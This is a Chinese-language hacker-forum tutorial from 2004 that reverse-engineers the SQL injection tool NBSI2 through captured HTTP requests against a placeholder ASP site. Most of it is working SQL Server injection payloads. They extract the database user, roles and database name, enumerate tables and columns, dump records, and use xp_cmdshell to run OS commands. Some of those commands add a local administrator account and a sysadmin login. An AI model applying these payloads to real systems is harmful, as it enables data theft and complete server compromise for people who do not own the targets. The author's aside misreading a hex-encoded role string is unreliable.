nbsi2內部功能實現大揭謎
前段時間sql注入很流行,用過小竹的nb2的人可能都知道,這個工具接近無敵,菜鳥用了它也能數秒把一個站給黑了,但是不了解其中的注入過程 可以說永遠都進步不了吧~~
首先聲明,我也只是菜鳥一個,正好最近在研究sql,隨便把nb2的注入過程給研究了一個,所用工具wse,相信大家不會陌生的,網上到處有得下,我給一個地址,http://www.gxgl.com/soft/wse06b1.zip,這是一個用來監視和修改網絡發送和接收數據的程序,可以用來幫助您調試網絡應用程序。
廢話少說,開工,先在網上隨便找一個有sql注入漏洞得站點www.testdb.net,找到一個注射點:http://www.testdb.net/article_read.asp?id=80
呵呵,www.testdb.net這個網址當然是不存在了。
過程一、取得sql server數據庫信息
打開nb2,輸入地址:http://www.testdb.net/article_read.asp?id=80,選擇"get"方式,點"檢測"按鈕,
取得sql server數據庫得如下信息:
多句執行:未知
子查詢:支持
當前用戶:test
用戶權限:db_owner
當前庫:testdb
用過nb2的人應該都很熟悉上面的內容把~~
%20解釋為空格 %2b解釋為+號,%25解釋為%號
http/1.1 200 ok //返回成功
http/1.1 500 internal server error
用wse檢測get包信息,如下:
get /article_read.asp?id=80 http/1.1
get /article_read.asp?id=80%20and%20user%2bchar(124)=0 http/1.1
即:article_read.asp?id=80 and user+char(124)=0
char(124)為字符'|'
get /article_read.asp?id=80;declare%[email protected]%20int-- http/1.1
即:article_read.asp?id=80;declare @a int--
//判斷是否支持多句查詢
get /article_read.asp?id=80%20and%20(select%20count(1)%20from%20[sysobjects])>=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80%3bdeclare+%40a+int%2d%2d; aspsessionidsstcttqd=ellnneidceeanbmokamgjged
即:article_read.asp?id=80 and (select count(1) from [sysobjects])>=0
//判斷是否支持子查詢
get /article_read.asp?id=80%20and%20user%2bchar(124)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0;
aspsessionidsstcttqd=ellnneidceeanbmokamgjged
即:article_read.asp?id=80 and user+char(124)=0
//取得當前用戶
user是sqlserver的一個內置變量,它的值是當前連接的用戶名,類型為nvarchar。拿一個nvarchar的值跟int的數0比較,系統會先試圖將
nvarchar的值轉成int型,轉的過程中肯定會出錯,當然,轉的過程中肯定會出錯,sqlserver的出錯提示是:將nvarchar值 ”east_asp” 轉
換數據類型為 int 的列時發生語法錯誤,呵呵,east_asp正是變量user的值,這樣,不廢吹灰之力就拿到了數據庫的用戶名。and user>0
get /article_read.asp?id=80%20and%20cast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20varchar(1))%2bchar(124)
=1 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0;
aspsessionidsstcttqd=ellnneidceeanbmokamgjged
即:article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))+char(124)=1
函數說明:
is_srvrolemember指明當前的用戶登錄是否是指定的服務器角色的成員。
語法
is_srvrolemember ( 'role' [ , 'login' ] )
參數
'role' 被檢查的服務器角色的名稱。role 的數據類型為 sysname。
role 有效的值是: sysadmin,dbcreator,diskadmin,processadmin,serveradmin,etupadmin,securityadmin
'login'
將要檢查的登錄的可選名稱。login 的數據類型為 sysname,默認值為 null。如果未指定,那么使用當前用戶的登錄帳戶。
select cast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))+char(124) 結果為"1|"
get /article_read.asp?id=80%20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20varchar(1))%2bchar(124)=1
http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0;
aspsessionidsstcttqd=ellnneidceeanbmokamgjged
即:article_read.asp?id=80 and cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))+char(124)=1
select cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))+char(124) 結果為"1|",和上面得返回結果一樣,但注意
is_member里面的那一長字符串和上面的不一樣,不知代表什么意思,0x730079007300610064006d0069006e00轉化后為"|o|@ e ",本以為
是"sysadmin"類似的字串,但看來不是,算了,不想了,呵呵,但我想,其作用應該是取得當前用戶的權限把,如:db_owner
get /article_read.asp?id=80%20and%20db_name()%2bchar(124)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0;
aspsessionidsstcttqd=ellnneidceeanbmokamgjged
即:article_read.asp?id=80 and db_name()+char(124)=0
這一句,看到有一個db_name()函數,不用多說,大家應該知道了,db_name()是另一個系統變量,返回的是連接的數據庫名。
到次,獲取sql數據庫信息的過程算是分析完畢。
另:post方法不再詳細分析,大家可自己看一下,下面是post方法時抓的包,具體同get方法基本一樣,主要看最后一行的信息。
其中也用到很多技巧:如下:
id=80%20and%20user%2bchar(124)=0
id=80'%20and%20user%2bchar(124)=0%20and%20''='
id=80%25'%20and%20user%2bchar(124)=0%20and%20'%25'='
id=80%20and%201=1
id=80%20and%201=2
id=80'%20and%201=1%20and%20''='
id=80'%20and%201=2%20and%20''='
id=80%25'%20and%201=1%20and%20'%25'='
id=80%25'%20and%201=2%20and%20'%25'='
//////////////////////////////////////////////
過程二、猜解表名
top1
get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from(select%20top%201%20id,name%
20from%20[testdb]..[sysobjects]%20where%20xtype=char(85)%20order%20by%20id)%20t%20order%20by%20id%20desc)>0 http/1.1
即:article_read.asp?id=80 and (select top 1 cast(name as varchar(8000)) from(select top 1 id,name from
[testdb]..[sysobjects] where xtype=char(85) order by id) t order by id desc)>0
char(85)='u'
作用是取得testdb數據庫第一個表的表名,以此類推top n,可以取得其它的表名。
top2
get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from(select%20top%202%20id,name%
20from%20[testdb]..[sysobjects]%20where%20xtype=char(85)%20order%20by%20id)%20t%20order%20by%20id%20desc)>0 http/1.1
...
topn
wse抓獲的包信息:
get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from(select%20top%201%20id,name%
20from%20[testdb]..[sysobjects]%20where%20xtype=char(85)%20order%20by%20id)%20t%20order%20by%20id%20desc)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%
3d0
...........
//////////////////////////////////////////////
過程三、根據某個表名猜解列名
表名:article
top1
get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%201%
20colid,name%20from%20[testdb]..[syscolumns]%20where%20id%20=%20object_id(nchar(101)%2bnchar(97)%2bnchar(115)%2bnchar(116)%
2bnchar(104)%2bnchar(111)%2bnchar(116)%2bnchar(46)%2bnchar(46)%2bnchar(65)%2bnchar(82)%2bnchar(84)%2bnchar(73)%2bnchar(67)%
2bnchar(76)%2bnchar(69))%20order%20by%20colid)%20t%20order%20by%20colid%20desc)>0 http/1.1
即:article_read.asp?id=80 and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from
[testdb]..[syscolumns] where id = object_id(nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+
nchar(116)+nchar(46)+nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69))
order by colid) t order by colid desc)>0
作用是取得article表的第一個列的列名,以此類推top n,可以取得其它的列名。
函數說明:
object_id 返回數據庫對象標識號。
語法 object_id ( 'object' )
參數 'object'
要使用的對象。object 的數據類型為 char 或 nchar。如果 object 的數據類型是 char,那么隱性將其轉換成 nchar。
返回類型 int
nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+nchar(116)+nchar(46)+
nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69)
對應于字符串 testdb..article
即是:article_read.asp?id=80 and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from
[testdb]..[syscolumns] where id = object_id('testdb..article')
order by colid) t order by colid desc)>0
top2
get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%202%
20colid,name%20from%20[testdb]..[syscolumns]%20where%20id%20=%20object_id(nchar(101)%2bnchar(97)%2bnchar(115)%2bnchar(116)%
2bnchar(104)%2bnchar(111)%2bnchar(116)%2bnchar(46)%2bnchar(46)%2bnchar(65)%2bnchar(82)%2bnchar(84)%2bnchar(73)%2bnchar(67)%
2bnchar(76)%2bnchar(69))%20order%20by%20colid)%20t%20order%20by%20colid%20desc)>0 http/1.1
topn
...
wse抓獲的包信息:
get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%201%
20colid,name%20from%20[testdb]..[syscolumns]%20where%20id%20=%20object_id(nchar(101)%2bnchar(97)%2bnchar(115)%2bnchar(116)%
2bnchar(104)%2bnchar(111)%2bnchar(116)%2bnchar(46)%2bnchar(46)%2bnchar(65)%2bnchar(82)%2bnchar(84)%2bnchar(73)%2bnchar(67)%
2bnchar(76)%2bnchar(69))%20order%20by%20colid)%20t%20order%20by%20colid%20desc)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%
3d0
...............
//////////////////////////////////////////////
過程四、根據列名猜解字段內容
字段名:title
top1
get /article_read.asp?id=80%20and%20(select%20top%201%20isnull(cast([title]%20as%20varchar(8000)),char(32))%2bchar(124)%
20from%20(select%20top%201%20[title]%20from%20[testdb]..[article]%20where%201=1%20order%20by%20[title])%20t%20order%20by%20
[title]%20desc)>0 http/1.1
即:article_read.asp?id=80 and (select top 1 isnull(cast([title] as varchar(8000)),char(32))+char(124)
from (select top 1 [title] from [testdb]..[article] where 1=1 order by [title]) t order by [title] desc)>0
作用是取得title字段的第一行記錄的值,以此類推top n,可以取得其它行的值。
top2
get /article_read.asp?id=80%20and%20(select%20top%201%20isnull(cast([title]%20as%20varchar(8000)),char(32))%2bchar(124)%
20from%20(select%20top%202%20[title]%20from%20[testdb]..[article]%20where%201=1%20order%20by%20[title])%20t%20order%20by%20
[title]%20desc)>0 http/1.1
topn
...
wse抓獲的包信息:
//取得article表的記錄數
get /article_read.asp?id=80%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(124)%20from%20[testdb]..[article]%
20where%201=1)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%
3d0
//取得article表的title字段的第一條記錄內容
get /article_read.asp?id=80%20and%20(select%20top%201%20isnull(cast([title]%20as%20varchar(8000)),char(32))%2bchar(124)%
20from%20(select%20top%201%20[title]%20from%20[testdb]..[article]%20where%201=1%20order%20by%20[title])%20t%20order%20by%20
[title]%20desc)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%
3d0
...............
//////////////////////////////////////////////
到此,數據庫的表名,字段名及字段內容的分析基本結束,再看一下其它主要功能的分析。
過程五、執行dos命令和執行sql語句
執行dos命令 dir c:/
////////////////////////////////////////////////
回顯抓包分析:
get /article_read.asp?id=80%20and%20db_name()%2bchar(124)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%
3d0
get /article_read.asp?id=80;exec%20master..xp_cmdshell%20'dir%20c:/%20>%20c:/nb_commander_txt.log';drop%20table%
20nb_commander_tmp;create%20table%20nb_commander_tmp(resulttxt%20varchar(7996)%20null);bulk%20insert%20[testdb]..
[nb_commander_tmp]%20from%20'c:/nb_commander_txt.log'%20with%20(keepnulls);alter%20table%20nb_commander_tmp%20add%20id%
20int%20not%20null%20identity%20(1,1)-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%
3d0
主要是這個:
article_read.asp?id=80;exec master..xp_cmdshell 'dir c:/ > c:/nb_commander_txt.log';
drop table nb_commander_tmp;create table nb_commander_tmp(resulttxt varchar(7996) null);
bulk insert [testdb]..[nb_commander_tmp] from 'c:/nb_commander_txt.log' with (keepnulls);
alter table nb_commander_tmp add id int not null identity%20(1,1)--
bulk insert 以用戶指定的格式復制一個數據文件至數據庫表或視圖中。
keepnulls 指定在大容量復制操作中空列應保留一個空值,而不是對插入的列賦予默認值。
具體的詳細介紹請查看t-sql語法,有詳細說明。
上面語句的功能就是就是將執行dos命令dir c:/的結果保存到一個文件nb_commander_txt.log中,然后將此文件的內容寫入到新建的臨時表
nb_commander_tmp,并增加一個自增長字段id,相信大家很容易看明白。
id=1
get /article_read.asp?id=80%20and%20(select%20top%201%20case%20when%20resulttxt%20is%20null%20then%20'|'%20else%20resulttxt%
2b'|'%20end%20from%20nb_commander_tmp%20where%20id=1)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%27dir+c%3a%5c+%3e+c%
3a%5cnb%5fcommander%5ftxt%2elog%27%3bdrop+table+nb%5fcommander%5ftmp%3bcreate+table+nb%5fcommander%5ftmp%
28resulttxt+varchar%287996%29+null%29%3bbulk+insert+%5btestdb%5d%2e%2e%5bnb%5fcommander%5ftmp%5d+from+%27c%3a%5cnb%
5fcommander%5ftxt%2elog%27+with+%28keepnulls%29%3balter+table+nb%5fcommander%5ftmp+add+id+int+not+null+identity+%281%2c1%29%
2d%2d
即:article_read.asp?id=80 and (select top 1 case when resulttxt is null then '|' else resulttxt+'|' end
from nb_commander_tmp where id=1)=0
輸入第一條回顯結果,以下同,topn輸入所有的回顯結果。
id=2
get /article_read.asp?id=80%20and%20(select%20top%201%20case%20when%20resulttxt%20is%20null%20then%20'|'%20else%20resulttxt%
2b'|'%20end%20from%20nb_commander_tmp%20where%20id=2)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%27dir+c%3a%5c+%3e+c%
3a%5cnb%5fcommander%5ftxt%2elog%27%3bdrop+table+nb%5fcommander%5ftmp%3bcreate+table+nb%5fcommander%5ftmp%
28resulttxt+varchar%287996%29+null%29%3bbulk+insert+%5btestdb%5d%2e%2e%5bnb%5fcommander%5ftmp%5d+from+%27c%3a%5cnb%
5fcommander%5ftxt%2elog%27+with+%28keepnulls%29%3balter+table+nb%5fcommander%5ftmp+add+id+int+not+null+identity+%281%2c1%29%
2d%2d
id=n
...............
輸出顯示:
[意外輸出]
[意外輸出]
[意外輸出]
[意外輸出]
[意外輸出]
[意外輸出]
[意外輸出]
[意外輸出]
[意外輸出]
[意外輸出]
...
...
...
如果正常沒有問題,會輸出c:/下所有的文件,出現上面的提示,可能原因是數據表nb_commander_tmp沒有創建成功,因此不能正確輸出。
////////////////////////////////////////////////
不回顯抓包分析:
dos命令 dir c:/
get /article_read.asp?id=80;exec%20master..xp_cmdshell%20'dir%20c:/'-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bdrop+table+nb%5fcommander%5ftmp%3bexec+master%2e%2exp%
5fcmdshell+%27del+c%3a%5cnb%5fcommander%5ftxt%2elog%27%2d%2d
即:article_read.asp?id=80;exec master..xp_cmdshell 'dir c:/'--
不需要顯示輸出結果。
輸出顯示:
命令執行完成
////////////////////////////////////////////////
dos命令:
net user tsinternetusers password /add
get /article_read.asp?id=80;exec%20master..xp_cmdshell%20'net%20user%20tsinternetusers%20password%20/add'-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%27dir+c%3a%5c%27%2d%2d
執行其它dos命令都同上。
id=80;exec master..xp_cmdshell 'net user tsinternetusers password /add'--
id=80;exec master..xp_cmdshell 'net localgroup administrators tsinternetusers /add'--
執行sql命令(同執行dos命令)
get /article_read.asp?id=80;exec%20master..sp_addlogin%20username,password-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%
27net+user+tsinternetusers+password+%2fadd%27%2d%2d
id=80;exec master..sp_addlogin username,password--
id=80;exec master..sp_addsrvrolemember username,sysadmin--
....
////////////////////////////////////////////////
到此,nb2的主要功能分析完畢,其它的功能大家可以自己分析,第一次寫這么長的文章,可能很亂,也一定存在不少問題,不過實在沒有精力
去逐字修改了,希望大家能看明白。謝謝!
hnxyy(虛空)
2004/11/26 晚 10:30
